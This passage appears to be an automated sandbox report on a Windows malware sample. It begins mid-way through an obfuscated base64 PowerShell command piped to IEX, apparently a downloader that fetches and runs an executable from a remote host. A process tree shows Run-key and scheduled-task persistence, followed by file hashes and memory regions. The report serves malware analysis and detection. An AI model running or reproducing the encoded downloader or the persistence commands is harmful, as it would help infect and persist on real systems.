8AQQBGAFkAQQBPAGcAQgAwAEEARQBVAEEAYgBRAEIAUQBBAEMAcwBBAEoAdwBCAGMAQQBHAFUAQQBhAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAE8AdwBBAE4AQQBBAG8AQQBhAHcAQgBzAEEASABJAEEAYgB3AEIAeQBBAEcAawBBAFkAdwBCAGkAQQBHAHMAQQBkAGcAQgBtAEEARwBFAEEAWgBnAEIAcwBBAEcARQBBAGIAZwBCADAAQQBHADQAQQBhAGcAQgBuAEEAQwBBAEEASgB3AEIAbwBBAEgAUQBBAGQAQQBCAHcAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBnAEIAcgBBAEcARQBBAEwAUQBCADAAQQBHAFUAQQBhAHcAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMANABBAGQAQQBCAHkAQQBDADgAQQBRAFEAQgBWAEEARQBjAEEATAB3AEIAMwBBAEcAVQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgAWQBBAGMAUQBCADQAQQBIAFEAQQBaAEEAQgBvAEEARwBZAEEAWQB3AEIAawBBAEcAZwBBAFoAUQBCAGkAQQBIAFUAQQBaAEEAQgBuAEEARABzAEEARABRAEEASwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHADQAQQBhAHcAQgBoAEEAQwAwAEEAZABBAEIAbABBAEcAcwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQB1AEEASABRAEEAYwBnAEEAdgBBAEUARQBBAFYAUQBCAEgAQQBDADgAQQBkAHcAQgBsAEEARwBRAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBDAEEAQQBKAEEAQgAyAEEASABFAEEAZQBBAEIAMABBAEcAUQBBAGEAQQBCAG0AQQBHAE0AQQBaAEEAQgBvAEEARwBVAEEAWQBnAEIAMQBBAEcAUQBBAFoAdwBBADcAQQBBADAAQQBDAGcAQgByAEEARwB3AEEAYwBnAEIAdgBBAEgASQBBAGEAUQBCAGoAQQBHAEkAQQBhAHcAQgAyAEEARwBZAEEAWQBRAEIAbQBBAEcAdwBBAFkAUQBCAHUAQQBIAFEAQQBiAGcAQgBxAEEARwBjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEAWQBRAEIAdQBBAEcAcwBBAFkAUQBBAHQAQQBIAFEAQQBaAFEAQgByAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEwAZwBCADAAQQBIAEkAQQBMAHcAQgBCAEEARgBVAEEAUgB3AEEAdgBBAEgAYwBBAFoAUQBCAGsAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAUQBBAGQAZwBCAHgAQQBIAGcAQQBkAEEAQgBrAEEARwBnAEEAWgBnAEIAagBBAEcAUQBBAGEAQQBCAGwAQQBHAEkAQQBkAFEAQgBrAEEARwBjAEEATwB3AEEATgBBAEEAbwBBAGYAUQBCAGoAQQBHAEUAQQBkAEEAQgBqAEEARwBnAEEAZQB3AEIAOQBBAEEAPQA9ACIAKQApAHwASQBFAFgA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ei.exe"C:\Users\Admin\AppData\Local\Temp\ei.exe"4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"6⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\expo.exe"C:\Users\Admin\AppData\Roaming\expo.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ammero.exe"C:\Users\Admin\AppData\Roaming\ammero.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DPI Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmpAEB5.tmp"7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DPI Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpB09A.tmp"7⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exeMD5
91c9ae9c9a17a9db5e08b120e668c74c
SHA150770954c1ceb0bb6f1d5d3f2de2a0a065773723
SHA256e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
SHA512ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exeMD5
91c9ae9c9a17a9db5e08b120e668c74c
SHA150770954c1ceb0bb6f1d5d3f2de2a0a065773723
SHA256e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
SHA512ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e
-
C:\Users\Admin\AppData\Local\Temp\tmpAEB5.tmpMD5
f7eb19c49b51cdff67a25c6876a78241
SHA16d86be501c2fb57b50292a55d3983b7eee8a688d
SHA256c9dab73a0044021d2acbc3952b19dea98cdfd838afc633197bd1bd12d2562fba
SHA5121e94e363f9d4d0dcdfe0a8457642fcfe4f81dff0b39f1d1f00deab9291e133cd40b48c097dfe52c356d4a15c383e0aa08fae28b136937bcc57d5e01861716740
-
C:\Users\Admin\AppData\Local\Temp\tmpB09A.tmpMD5
a9af285136db016a568e4a53208f21d0
SHA1e1afef2b7ee8ae945353315daa19a15574b435b7
SHA2567dce876e35550f4a5b8ce8a8bbab3b0ccd7c5b8660f9db4b832466b77e3a8b7c
SHA51280a1f5e463a87cddc0f66336e2dc4262daf98984c6f6c662c3615d615ebe7c58677c3d694edb3bd7816ccee969aae967c7efe8526ba423f274ac1210c0c8bd6e
-
C:\Users\Admin\AppData\Roaming\ammero.exeMD5
605e939e44cd9b02c55ce0a09019ad47
SHA19ac8ff474631ed0c3d27a7290979b4880b9784f6
SHA2565ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
SHA5125196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d
-
C:\Users\Admin\AppData\Roaming\ammero.exeMD5
605e939e44cd9b02c55ce0a09019ad47
SHA19ac8ff474631ed0c3d27a7290979b4880b9784f6
SHA2565ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
SHA5125196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d
-
C:\Users\Admin\AppData\Roaming\expo.exeMD5
419179d921ed1c875e2c690ee521d516
SHA112750f63f89e8086d59948ebe3664473364f72dc
SHA25699b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
SHA512823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702
-
C:\Users\Admin\AppData\Roaming\expo.exeMD5
419179d921ed1c875e2c690ee521d516
SHA112750f63f89e8086d59948ebe3664473364f72dc
SHA25699b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
SHA512823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702
-
\Users\Admin\AppData\Local\Temp\InstallUtil.exeMD5
91c9ae9c9a17a9db5e08b120e668c74c
SHA150770954c1ceb0bb6f1d5d3f2de2a0a065773723
SHA256e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
SHA512ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e
-
\Users\Admin\AppData\Roaming\ammero.exeMD5
605e939e44cd9b02c55ce0a09019ad47
SHA19ac8ff474631ed0c3d27a7290979b4880b9784f6
SHA2565ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
SHA5125196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d
-
\Users\Admin\AppData\Roaming\expo.exeMD5
419179d921ed1c875e2c690ee521d516
SHA112750f63f89e8086d59948ebe3664473364f72dc
SHA25699b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
SHA512823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702
-
memory/432-125-0x0000000000000000-mapping.dmp
-
memory/628-101-0x0000000000000000-mapping.dmp
-
memory/628-106-0x0000000000B00000-0x0000000000B01000-memory.dmpFilesize
4KB
-
memory/628-104-0x0000000000CE0000-0x0000000000CE1000-memory.dmpFilesize
4KB
-
memory/628-116-0x0000000004CB0000-0x0000000004CB1000-memory.dmpFilesize
4KB
-
memory/628-108-0x0000000000B01000-0x0000000000B02000-memory.dmpFilesize
4KB
-
memory/628-111-0x0000000004B60000-0x0000000004B6B000-memory.dmpFilesize
44KB
-
memory/1108-92-0x0000000000000000-mapping.dmp
-
memory/1108-93-0x0000000000E30000-0x0000000000E31000-memory.dmpFilesize
4KB
-
memory/1108-95-0x00000000005C0000-0x00000000005C1000-memory.dmpFilesize
4KB
-
memory/1108-96-0x0000000000740000-0x0000000000761000-memory.dmpFilesize
132KB
-
memory/1108-97-0x00000000005C1000-0x00000000005C2000-memory.dmpFilesize
4KB
-
memory/1612-98-0x0000000000000000-mapping.dmp
-
memory/1660-119-0x00000000048C0000-0x00000000048C1000-memory.dmpFilesize
4KB
-
memory/1660-110-0x0000000000000000-mapping.dmp
-
memory/1660-114-0x0000000000140000-0x0000000000141000-memory.dmpFilesize
4KB
-
memory/1684-62-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1684-60-0x000000002F491000-0x000000002F494000-memory.dmpFilesize
12KB
-
memory/1684-133-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1684-61-0x0000000071AE1000-0x0000000071AE3000-memory.dmpFilesize
8KB
-
memory/1788-128-0x0000000000000000-mapping.dmp
-
memory/1832-63-0x0000000000000000-mapping.dmp
-
memory/1844-131-0x00000000004F0000-0x0000000000509000-memory.dmpFilesize
100KB
-
memory/1844-132-0x0000000000460000-0x0000000000463000-memory.dmpFilesize
12KB
-
memory/1844-126-0x0000000000470000-0x0000000000471000-memory.dmpFilesize
4KB
-
memory/1844-130-0x0000000000450000-0x0000000000455000-memory.dmpFilesize
20KB
-
memory/1844-123-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/1844-121-0x000000000041E792-mapping.dmp
-
memory/1844-120-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/1976-99-0x0000000000000000-mapping.dmp
-
memory/2008-74-0x0000000005640000-0x0000000005641000-memory.dmpFilesize
4KB
-
memory/2008-65-0x0000000075B31000-0x0000000075B33000-memory.dmpFilesize
8KB
-
memory/2008-66-0x00000000022A0000-0x00000000022A1000-memory.dmpFilesize
4KB
-
memory/2008-67-0x0000000004850000-0x0000000004851000-memory.dmpFilesize
4KB
-
memory/2008-64-0x0000000000000000-mapping.dmp
-
memory/2008-68-0x0000000004810000-0x0000000004811000-memory.dmpFilesize
4KB
-
memory/2008-69-0x0000000004812000-0x0000000004813000-memory.dmpFilesize
4KB
-
memory/2008-70-0x0000000004750000-0x0000000004751000-memory.dmpFilesize
4KB
-
memory/2008-71-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/2008-79-0x0000000006050000-0x0000000006051000-memory.dmpFilesize
4KB
-
memory/2008-80-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/2008-81-0x00000000062F0000-0x00000000062F1000-memory.dmpFilesize
4KB
-
memory/2008-88-0x0000000006170000-0x0000000006171000-memory.dmpFilesize
4KB
-
memory/2008-89-0x0000000006380000-0x0000000006381000-memory.dmpFilesize
4KB
-
memory/2008-90-0x00000000003C0000-0x00000000003C1000-memory.dmpFilesize
4KB